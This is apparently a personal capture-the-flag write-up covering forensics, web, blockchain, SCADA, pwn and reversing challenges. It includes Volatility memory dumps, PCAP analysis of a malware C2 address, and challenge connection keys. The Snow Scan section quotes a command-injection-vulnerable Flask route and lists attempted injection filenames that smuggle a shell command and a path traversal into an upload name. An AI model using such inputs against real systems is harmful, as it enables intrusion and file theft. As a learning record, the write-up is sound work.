4172 740 SearchIndexer. 0xad81ec4cf080 16 - 0 False 2023-06-13 12:32:53.000000 N/A Disabled
3424 740 TrustedInstall 0xad81ec4d0080 3 - 0 False 2023-06-13 12:32:37.000000 N/A Disabled
3420 696 userinit.exe 0xad81ec59d300 0 - 1 False 2023-06-13 12:32:46.000000 2023-06-13 12:33:15.000000 Disabled
4328 880 StartMenuExper 0xad81ec5bb080 6 - 1 False 2023-06-13 12:32:54.000000 N/A Disabled
6716 880 ShellExperienc 0xad81ec5be080 17 - 1 False 2023-06-13 12:34:56.000000 N/A Disabled
3924 740 svchost.exe 0xad81ec6782c0 7 - 1 False 2023-06-13 12:32:43.000000 N/A Disabled
3932 1028 sihost.exe 0xad81ec679080 12 - 1 False 2023-06-13 12:32:43.000000 N/A Disabled
3132 1592 ctfmon.exe 0xad81ec754240 12 - 1 False 2023-06-13 12:32:44.000000 N/A Disabled
3184 1028 taskhostw.exe 0xad81ec75d080 10 - 1 False 2023-06-13 12:32:44.000000 N/A Disabled
4104 740 svchost.exe 0xad81ecaa2080 3 - 0 False 2023-06-13 12:32:50.000000 N/A Disabled
5896 880 ApplicationFra 0xad81ecaa4080 3 - 1 False 2023-06-13 12:33:52.000000 N/A Disabled
4608 880 SearchApp.exe 0xad81ecdcd080 32 - 1 False 2023-06-13 12:32:55.000000 N/A Disabled
4484 880 RuntimeBroker. 0xad81ecdce2c0 13 - 1 False 2023-06-13 12:32:55.000000 N/A Disabled
6884 5200 msedge.exe 0xad81ece6f080 14 - 1 False 2023-06-13 12:35:30.000000 N/A Disabled
5424 5200 msedge.exe 0xad81ecec90c0 11 - 1 False 2023-06-13 12:33:09.000000 N/A Disabled
928 5200 msedge.exe 0xad81ecfab340 0 - 1 False 2023-06-13 12:35:16.000000 2023-06-13 12:35:44.000000 Disabled
4800 880 RuntimeBroker. 0xad81ed0ec2c0 6 - 1 False 2023-06-13 12:32:55.000000 N/A Disabled
5200 2952 msedge.exe 0xad81ed0f8080 54 - 1 False 2023-06-13 12:33:08.000000 N/A Disabled
6016 5200 msedge.exe 0xad81ed0fa080 20 - 1 False 2023-06-13 12:36:00.000000 N/A Disabled
4768 4172 SearchFilterHo 0xad81ed3cf340 6 - 0 False 2023-06-13 12:35:29.000000 N/A Disabled
But again, no such luck. I then generated a DLL list with dlllist > dlllist.log here, but unfortunately I don't yet know enough about Windows DLLs to know what to look for here. We were able to find some stuff that looks interesting with windows.cmdline.CmdLine:
PID Process Args
4 System Required memory at 0x20 is not valid (process exited?)
124 Registry Required memory at 0x20 is not valid (process exited?)
408 smss.exe \SystemRoot\System32\smss.exe
516 csrss.exe %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
592 wininit.exe wininit.exe
616 csrss.exe %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
696 winlogon.exe winlogon.exe
740 services.exe C:\Windows\system32\services.exe
748 lsass.exe C:\Windows\system32\lsass.exe
880 svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p
908 fontdrvhost.ex "fontdrvhost.exe"
916 fontdrvhost.ex "fontdrvhost.exe"
1004 svchost.exe C:\Windows\system32\svchost.exe -k RPCSS -p
504 dwm.exe "dwm.exe"
1028 svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p
1168 upfc.exe C:\Windows\System32\Upfc.exe /launchtype boot /cv 51tlxXBJ6UifoEf6UqyGXA.0
1212 svchost.exe C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1220 svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1240 svchost.exe C:\Windows\system32\svchost.exe -k LocalService -p
1428 VBoxService.ex C:\Windows\System32\VBoxService.exe
1592 svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p
1684 MemCompression Required memory at 0x20 is not valid (process exited?)
1816 svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1892 svchost.exe C:\Windows\system32\svchost.exe -k appmodel -p
1924 svchost.exe C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1916 svchost.exe C:\Windows\system32\svchost.exe -k NetworkService -p
1932 svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1652 spoolsv.exe C:\Windows\System32\spoolsv.exe
2052 svchost.exe C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
2232 svchost.exe C:\Windows\System32\svchost.exe -k utcsvc -p
2256 MsMpEng.exe "C:\ProgramData\Microsoft\Windows Defender\platform\4.18.23050.3-0\MsMpEng.exe"
2620 taskhostw.exe taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2788 svchost.exe C:\Windows\system32\svchost.exe -k wsappx -p
2976 ngentask.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe" /RuntimeWide /Critical /StopEvent:980
2992 ngentask.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe" /RuntimeWide /Critical /StopEvent:992
3000 conhost.exe \??\C:\Windows\system32\conhost.exe 0x4
3032 conhost.exe \??\C:\Windows\system32\conhost.exe 0x4
2784 svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
788 ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe" ExecuteQueuedItems 2 /LegacyServiceBehavior
3424 TrustedInstall C:\Windows\servicing\TrustedInstaller.exe
3468 TiWorker.exe C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.2905_none_7dd39c4c7cb9dfa0\TiWorker.exe -Embedding
3924 svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
3932 sihost.exe sihost.exe
3184 taskhostw.exe taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
3132 ctfmon.exe "ctfmon.exe"
3420 userinit.exe Required memory at 0x7fa4c87020 is not valid (process exited?)
2952 explorer.exe C:\Windows\Explorer.EXE
3316 svchost.exe C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p
4104 svchost.exe C:\Windows\System32\svchost.exe -k swprv
4172 SearchIndexer. C:\Windows\system32\SearchIndexer.exe /Embedding
4328 StartMenuExper "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
4484 RuntimeBroker. C:\Windows\System32\RuntimeBroker.exe -Embedding
4608 SearchApp.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
4800 RuntimeBroker. C:\Windows\System32\RuntimeBroker.exe -Embedding
1284 RuntimeBroker. C:\Windows\System32\RuntimeBroker.exe -Embedding
2748 smartscreen.ex C:\Windows\System32\smartscreen.exe -Embedding
2672 SecurityHealth "C:\Windows\System32\SecurityHealthSystray.exe"
5052 SecurityHealth C:\Windows\system32\SecurityHealthService.exe
5124 VBoxTray.exe "C:\Windows\System32\VBoxTray.exe"
5200 msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
5228 msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\rsteven\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\rsteven\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=114.0.5735.91 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=114.0.1823.37 --initial-client-data=0x164,0x168,0x16c,0x140,0x178,0x7ffed62c4210,0x7ffed62c4220,0x7ffed62c4230
5396 msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1784 --field-trial-handle=1972,i,6865033189529423298,9519355283962404745,262144 /prefetch:2
5404 msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 --field-trial-handle=1972,i,6865033189529423298,9519355283962404745,262144 /prefetch:3
5424 msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2432 --field-trial-handle=1972,i,6865033189529423298,9519355283962404745,262144 /prefetch:8
5896 ApplicationFra C:\Windows\system32\ApplicationFrameHost.exe -Embedding
4984 WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe
4092 svchost.exe C:\Windows\system32\svchost.exe -k WbioSvcGroup
6108 audiodg.exe C:\Windows\system32\AUDIODG.EXE 0x51c
3780 svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
6012 SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
5916 MoUsoCoreWorke C:\Windows\System32\mousocoreworker.exe -Embedding
604 svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
6264 svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
6420 WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe
6716 ShellExperienc "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
6840 RuntimeBroker. C:\Windows\System32\RuntimeBroker.exe -Embedding
928 msedge.exe Required memory at 0x9397928020 is not valid (process exited?)
5944 TextInputHost. "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
3880 msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=3 --enable-main-frame-before-activation --renderer-client-id=17 --time-ticks-at-unix-epoch=-1686659544494870 --launch-time-ticks=180344912 --mojo-platform-channel-handle=4528 --field-trial-handle=1972,i,6865033189529423298,9519355283962404745,262144 /prefetch:1
1052 msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=3 --enable-main-frame-before-activation --renderer-client-id=18 --time-ticks-at-unix-epoch=-1686659544494870 --launch-time-ticks=180356326 --mojo-platform-channel-handle=5072 --field-trial-handle=1972,i,6865033189529423298,9519355283962404745,262144 /prefetch:1
6936 SearchProtocol "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe2_ Global\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
4768 SearchFilterHo "C:\Windows\system32\SearchFilterHost.exe" 0 796 800 808 8192 804 780
6884 msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=3 --enable-main-frame-before-activation --renderer-client-id=22 --time-ticks-at-unix-epoch=-1686659544494870 --launch-time-ticks=185473805 --mojo-platform-channel-handle=5984 --field-trial-handle=1972,i,6865033189529423298,9519355283962404745,262144 /prefetch:1
6612 ngen.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" /NoDependencies /noroot /version:v4.0.30319 /LegacyServiceBehavior
5736 vlc.exe "C:\Users\rsteven\Desktop\vlc-win32\vlc.exe"
6016 msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=3 --enable-main-frame-before-activation --renderer-client-id=26 --time-ticks-at-unix-epoch=-1686659544494870 --launch-time-ticks=216196232 --mojo-platform-channel-handle=5684 --field-trial-handle=1972,i,6865033189529423298,9519355283962404745,262144 /prefetch:1
2248 mscorsvw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 330 -InterruptEvent 0 -NGENProcess 354 -Pipe 2dc -Comment "NGen Worker Process"
What specifically stood out is C:\Users\rsteven\Desktop\vlc-win32\vlc.exe, and we know that "leaked footage" was the cause of the malware infection, so this is good! I dumped the process with windows.pslist.PsList --pid 5736 --dump, but the output didn't contain anything useful and neither did the resulting pid.5736.0x7ff729430000.dmp file. I then ran a file scan with windows.filescan.FileScan > filescan.log to see if our PID was present so we could get our hands on the original infection vector video file (output), and the following relevant results were present:
0xad81eac310c0 \Users\rsteven\Desktop\vlc-win32\libvlc.dll 216
0xad81ec6b5b00 \Users\rsteven\Desktop\vlc-win32\vlc.exe 216
0xad81ecda9910 \Users\rsteven\Desktop\vlc-win32\vlc.exe 216
0xad81ecdb33c0 \Users\rsteven\Desktop\vlc-win32 216
0xad81ed453600 \Users\rsteven\Desktop\vlc-win32\libvlccore.dll 216
0xad81ed454410 \Users\rsteven\Desktop\vlc-win32 216
0xad81ed4545a0 \Users\rsteven\Desktop\vlc-win32\ffmpeg.dll 216
0xad81ed454730 \Users\rsteven\Desktop\vlc-win32 216
I looked more to see if there were any of the common video file types present, such as mov and mp4, but there were no hits. Next I tried to look at the handles of the process via windows.handles.Handles --pid 5736 to look for File or FileObject types, so we could dump the detected files of interest with windows.dumpfiles.DumpFiles --pid 5736 --handles [handle value]. The results of the scan are available in handles.log, but unfortunately I didn't see anything interesting there either.
I tried dumping all the files associated with the PID via windows.dumpfiles.DumpFiles --pid 5736 -D ./dumped_files, but the DataSectionObject ones all said Error dumping file and only the ImageSectionObject or SharedCacheMap ones didn't. I did get some DAT files, so the first thing I did was ran strings dumped_files/file.0xad81ec6b5b00.0xad81ea91a150.DataSectionObject.vlc.exe.dat -n 6, but I didn't find anything useful in the output.
Out of ideas, I did some looking around and found a cheatsheet of potentially useful things to try. I started with malfind > malfind.log (output), which is intended to look for code injections, but the results all looked like false positives. I then checked out this article and their suggestions, but we had tried all of them already, so I was completely out of ideas.
I went back to the PCAP and started from the top, and noticed that an outbound request was made to bzib.nelreports.net, which displays a page saying "Your Functions 3.0 app is up and running", but found nothing further. The domain has been around since 2021 and there are no indications that it is malicious. There was another request to https://sb.scorecardresearch.com/, but some research indicated that the site just served to conduct web tagging for analytical purposes.
Next one of interest was trc.taboola.com, which had a lot of hits on VirusTotal, but seemed to only be an ads-related site. Same with sync.outbrain.com, code.yengo.com, eb2.3lift.com, cm.mgid.com, trace.mediago.io, trace.popin.cc, recs.engageya.com, abema.tv, and www.stream.co.jp. I did notice that an initial request to v10.events.data.microsoft.com was made before most of the ones to v10.events.data.microsoftcloudservices.com, but I don't see how that helps us.
To filter down to only the malicious requests, we can use dns.qry.name contains "v10.events.data.microsoftcloudservices.com"; inversely, that filter can be reversed with !(...) to get all the other traffic. This didn't highlight anything other than the list of applications that the user had installed:
- Discord
- Slack
- Grammarly
- Microsoft Edge
- Skype
- Video LAN (?)
- Firefox
- 1password
No Start Where
As echoes of the Dark War lingered in UNZ's cyber-warfare HQ, a beacon blinked ominously. An analyst turned a wary eye to the screen. The alarm signal originated from the main system that controls the mining machinery! It was an attack from the Board of Arodor, aimed at crippling the mining infrastructure. Initial investigation of the network traffic revealed that the system has been compromised! Your task is to disinfect the system by uncovering the infiltration method and potential post-exploitation steps!
The PCAP only has 1499 packets, so parsing through it manually for an initial triage won't take too long. The first thing I noticed is an HTTP request to http://140.238.217.117:4953/Security Baseline Discipline.zip, so I decided to export the HTTP object to take a look at the file's contents.
Before opening anything, I ran the ZIP through Hybrid Analysis to get an idea of the malicious potential. It said the Word Doc is clean but the baseline.scr file is malicious, so I decided to open the Word Doc first. There wasn't anything interesting in the file, so I did a quick scan of the metadata just in case there were any hints. We did get the following pieces of info, which are not immediately useful:
- Author: Miller, Kim
- Company: State of New Hampshire
- Create time: 28-03-2023 09:54:00
- Last saved by: Long Nguyen
- Last saved time: 12-06-2023 04:39:00
- Title: Vendor Risk Assessment Report
Next I uploaded the baseline.scr to Hybrid Analysis and Virus Total, and both were confident that it was malware. I paused here to continue looking through the PCAP, and the next thing I noticed was the executable WINWORD.EXE in packet 397. It didn't appear to be malicious and couldn't run on my device, so I left it alone for the time being.
I saw a good amount of data being POSTed in packets 807 and 848, so I made a note to circle back because data exfil might be taking place. The client also received a good bit of data in packet 1437, but when I uploaded the hex to CyberChef I wasn't able to make any sense of it or determine a data type. It looks like that data was a response to a typical ping that had been made many times throughout the capture, so it may have been a command from the C2 at 140.238.217.117. On a whim I tried visiting the IP, but no dice.
It seems the only relevant traffic to the chall is http, so I went ahead and applied that as a filter to bring us down to 142/1499 packets. Whenever I looked deeper into the regular ping-like outbound connections and saw the hex for the media type, it caught my attention: 00000014deadbeef1945acc4000000000000000120667411. I remembered seeing deadbeef somewhere else, but some Googling didn't return anything useful for this challenge, so I discarded it; however, that same value was used for every ping-like POST request, so it may be a way to identify the system to the C2.
Whenever I returned back to packet 848, I tried exporting it as a file and inspecting the contents to determine the file type, but no dice. I wasn't able to discern anything from that packet. I circled back to the .scr file to see if that was the missing link that would allow us to better decode the C2 comms for the rest of the capture. When I ran strings ./baseline.scr -n 6, the only interesting thing I saw was publicKeyToken="6595b64144ccf1df", which Google said is used to force older programs to use XP common controls. This had some overlap with this blog post, so it may be worth returning to.
I tried running the .scr file in Windows Sandbox, but it gave the error popup There was a problem starting bundau.dll: The specified moduel could not be found. Next I tried on any.run, but was met with the same error of the executable being unable to be ran due to an OS version mismatch.
Web
Lazy Ballot
As a Zenium State hacker, your mission is to breach Arodor's secure election system, subtly manipulating the results to create political chaos and destabilize their government, ultimately giving Zenium State an advantage in the global power struggle.
First thing we need to do is login to the server, and we can see in database.js where the only user is created:
const pass = crypto.randomBytes(13).toString("hex");
this.userdb = this.couch.use("users");
let adminUser = {
username: "admin",
password: pass,
};
this.userdb.insert(adminUser, adminUser.username);
this.seedVotes();
I ran that code locally to see what the password would look like, and the text I got is f30a8f4db216981758079b17e8. This looks like it would take a while to brute force, so there is likely a better way to go about gaining authentication.
I attempted to write a brute force program in Python anyways as a backup plan while I looked for something else, which is available here.
Polaris Control
During the Dark War, the Zenium State, facing resource scarcity, sought to hack into Arodor's notorious malware command and control system, Polaris Control, to gain an advantage in the Mars space race. State hackers have contacted you claiming to have spotted a small programming error by performing tedious enumeration, can you help them escalate it?
The first interesting thing I notice is that the flag file is renamed in entrypoint.sh, so it becomes something like flagd05b576afe.txt. The flag isn't mentioned directly anywhere else in the code, so that means we're likely looking for some form of RCE or LFI to gain access to the contents.
Instead of searching through everything manually, I decided to try to look for a static code analysis tool to do some of the heavy lifting for me.
First I tried horusec:
docker run horuszup/horusec-cli:latest horusec start -p . -P $(pwd)
Blockchain
Paid Contr-actor
After a lifetime of preparation, the moment has arrived to enlist in the esteemed military of the United Nations of Zenium as an expert in blockchain security. Before embarking on your duties, there is a small matter of paperwork that requires your attention.
First step was running python3 -m pip install web3 py-solc-x eth-account, then I connected to the server with nc 94.237.57.211 45577 to get the relevant connection information:
Private key : 0x188d2ed79de415be6095c768dc8d6f06ae002b71a490621be7e98afb7989aeb0
Address : 0xb977eB04D06A88cB527F7B41b146D5b8E6EABd8B
Target contract : 0x8D9D0EF5b040BB7151f398aB26bE5e556E4c033e
Setup contract : 0x337dDb372d64A7984200Ea3789d72eA64CD784b1
To get the ABI for the contracts, they first need to be compiled:
npm install -g solc@0.8.18
solcjs --version
solcjs --abi Contract.sol Setup.sol
I used the Python script sign_contract.py to sign the contract, and it worked!
Answer: HTB{c0n9247u14710n5_y0u_423_kn0w_p427_0f_7h3_734m}; 325 points
Funds Secured
In Arodor, a state-of-the-art crowdfunding program fueled groundbreaking research. Powered by a smart contract, the program aimed to raise funds. Overseeing this campaign was a council board, responsible for finalizing the program through a multi-signature wallet scheme. Your goal is to exploit the contract and steal the funds, posing a threat to Arodor's noble scientific mission..
First thing was to get the connection information with nc 83.136.255.143 59550:
Private key : 0xe3997abc7297602e92fa1a5ab0500a28cd9935dd35cfb1d823c6bc56fce6df48
Address : 0xA51627d36347f40389bA45656b0a8243684d0385
Crowdfunding contract : 0x6741c5fC4AFF783547152dDC0Cc3FcCd2983aBeB
Wallet contract : 0x5b700566E46CcCB12A063548DF20dbB5eeFb3E49
Setup contract : 0x7E2b060F530ccb617CB42A64D036c7b6Ff153e84
Then I created the ABI files:
solcjs --abi Campaign.sol Setup.sol
Crypto
Initialization
During a cyber security audit of your government's infrastructure, you discover log entries showing traffic directed towards an IP address within the enemy territory of "Oumara". This alarming revelation triggers suspicion of a mole within Lusons' government. Determined to unveil the truth, you analyze the encryption scheme with the goal of breaking it and decrypting the suspicious communication. Your objective is to extract vital information and gather intelligence, ultimately protecting your nation from potential threats.
I'm gRoot
After decrypting the communication, you uncover the identity of the mole as the senior blockchain developer. Shockingly, the developer had embedded a backdoor in the government's decentralized blockchain network, originally designed to prevent corruption. You report this critical finding to the government council and are assigned with the task of detecting and fixing the backdoor, ensuring the integrity and security of the network.
Scada
Watch Tower
Our infrastructure monitoring system detected some abnormal behavior and initiated a network capture. We need to identify information the intruders collected and altered in the network.
Intrusion
After gaining access to the enemy's infrastructure, we collected crucial network traffic data from their Modbus network. Our primary objective is to swiftly identify the specific registers containing highly sensitive information and extract that data.
The PCAP consists entirely of modbus traffic, so that filter is not needed. I was able to use the following filters to separate the data into the three different segments that comprised the entirety of the PCAP:
# Reading coils
modbus.func_code == 1
# Writing to multiple coils
modbus.func_code == 15
# Writing to muliple registers
modbus.func_code == 16
There was hardly any useful data in the capture, but the different possible commands are available here. I decided to use a generic command on a few different addresses to see if I could find anything:
# I'm assuming that "Unit identifier" is the same as *slave_id* in the documentation
# *address* is the reference number from the PCAP, i.e. 0x00b3 here is 179 in decimal
command = tcp.read_holding_registers(address=0x00b3, count=100)
Fullpwn
Langmon
First thing here was to download OpenVPN and connect to the CTF infra so we can interact with the box.
Pwn
Snow Scan
In a rapidly unfolding scenario, an ancient Sumerian virus has surfaced, rapidly proliferating and posing a grave threat. Snow Crash, a menacing presence within the metaverse, has ventured beyond virtual realms, unleashing tangible repercussions in real life. In response to this crisis, the Board of Arodor has devised a vital tool—a service designed to meticulously scan and identify potential samples of Snow Crash. Would you consider harnessing this service to counter their efforts?
Looking at the Dockerfile, we can see that we will need to use the user ctf on port 1337 to interact with the challenge located at /home/ctf/challenge. We can also see that there is an uploads folder that will likely be important. The flag.txt file will be located in the challenge directory, so we need to find a way to read it.
There is a snowscan binary in the challenge directory, so I parsed through it with strings ./snowscan -n 6 but didn't find anything of interest. Running it said that we needed to provide a file as an argument; when I tried with flag.txt, it said that only .bmp files were accepted. Based on the snowscan.c file, I'd say the binary is just a precompiled version of the source code.
Whenever I loaded up the site in my browser, I could see the rendition of the index.html page template. The associated JS on image upload just checks the file type for .bmp and then POSTs it to the /snowscan endpoint, which returns a redirect to a response page (results.html). When I uploaded the provided dummy.bmp file, I got 25 PASS results, but nothing happened; the response parameter was just a URL-encoded plaintext of the result text.
I tried navigating to the /uploads/dummy.bmp endpoint, but the server didn't load it because it isn't a route in the Flask app in server.py. Looking more through that file, I can see the vulnerability:
@app.route('/snowscan', methods=['POST'])
def snowscan():
file = request.files['file']
# sanitize filename
filename = re.sub(r'[^a-zA-Z0-9_.-]', '', file.filename)
file_path = os.path.join(UPLOAD_DIR, filename)
if request.content_length > MAX_FILE_SIZE:
return 'File exceeds max size'
file.save(file_path)
try:
# VULNERABILITY HERE!
output = subprocess.run([SCANNER, file_path], capture_output=True, text=True, timeout=1).stdout
except subprocess.CalledProcessError as e:
output = e
return output
The subprocess.run call is vulnerable to command injection, so we can use that to read the flag file if we can bypass the regex filename sanitization.
My initial ideas were:
- Use something like
cat /home/ctf/challenge/flag.txt; #dummy.bmpas the file name - Use URL encoding in the file name like
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fhome%2fctf%2fchallenge%2fflag.txt #.bmp
Unfortunately neither of those did the trick, because the data we get back depends on the return of the snowscan binary. Unfortunately, looking at the binary, I can't see any way to take advantage of the subprocess.run because the return values of PASS and FAIL are hardcoded.
Device Control
You managed to successfully breach the enemy's device control server! With this accomplishment, you now possess a significant opportunity: to either mislead them through the creation of counterfeit devices or to delve deeper into the system and exploit it for complete system access. Choosing the former path allows you to manipulate their perceptions, potentially leading them astray and buying valuable time. However, should you opt for the latter, you can uncover hidden vulnerabilities and harness the system to your advantage, potentially neutralizing the enemy's capabilities entirely. The choice is yours
The user we are is ctf, and the flag is located at /home/ctf/challenge/flag.txt.
We can connect to the server with socat `tty`,raw,echo=0 tcp:83.136.255.242:32856, but once we do the display is confusing:
Adding a device allows us to select a slot, input a name, and add an IP address. Then when we select Show devices, a random country has been added to the VPN column; I saw France, Portugal, Vietnam, etc. Selecting Configure VPN allows us to change the country on a given slot, but every time I enter a name it gives an error like This location is not allowed: [Brazil] for whatever I entered, even with countries that were autopopulated initially.
However, entering the same country name works, and we get the message Country Changed!. The next prompt indicates that we're on the right track: Do you want to unlock the configuration of more devices? (y/n). If we enter y, we are prompted to Enter license key. We can see that this information is stored in /home/ctf/challenge/license.conf and it follows the format XXXX-XXXX-XXXX-XXXX-XXXX, but we don't know what the key is on the server.
Running strings ./device_control -n 6 on our local binary gives some useful info, such as a list of countries (Greece, Serbia, Italia, France, Portugal, Netherlands, Switzerland, Germany). We can see that the license.conf file is accessed after we input our license key, but can't see how to take advantage of it. There are two strings right after that are interesting:
- Error opening license.conf, please contact an Administrator.
- By entering this key, you can change VPN for all your devices.
But that's it.
Reversing
Intelligence Service
We've received some powerful intelligence gathering software from intercepting Arodor communications. Unfortunately, it requires a license key. Can you try and crack the keychecker?
Running strings ./service showed us the following info, which let us know that we need to use some actual rev software:
Welcome to our premium agency intelligence service!
To start using the service, please enter the key provided in the confirmation e-mail.
Activation Key:
[+] Activation key successfully redeemed; Thank you for using our services!
[!] Activation key invalid or expired
I decided to give Ghidra a go...
Backlinks